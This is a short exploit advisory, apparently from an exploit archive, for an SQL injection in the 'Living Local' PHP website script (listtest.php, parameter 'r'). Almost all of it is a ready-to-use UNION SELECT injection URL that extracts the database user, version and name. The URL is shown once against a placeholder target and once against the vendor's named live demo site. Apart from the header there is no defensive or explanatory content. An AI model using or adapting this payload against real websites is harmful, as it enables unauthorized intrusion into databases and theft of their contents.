id: 3595
date: 09/02/2008
title: Living Local Website (listtest.php r) SQL Injection Vulnerability
author: Hussin X
cves: 

=================================================================
Living Local Website (listtest.php r) SQL Injection Vulnerability
=================================================================



|___________________________________________________|
|
|  Living Local (listtest.php r) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|___________________________________________________
|                                                   |
|
| script : http://www.ezonescripts.com/scripts/sls/livinglocal.php
|
|___________________________________________________|

Exploit: 




www.[target].com/Script/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())--






L!VE DEMO:


http://www.ezonescripts.com/productdemos/LivingLocal/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())--




#  0day.today [2023-03-23]  #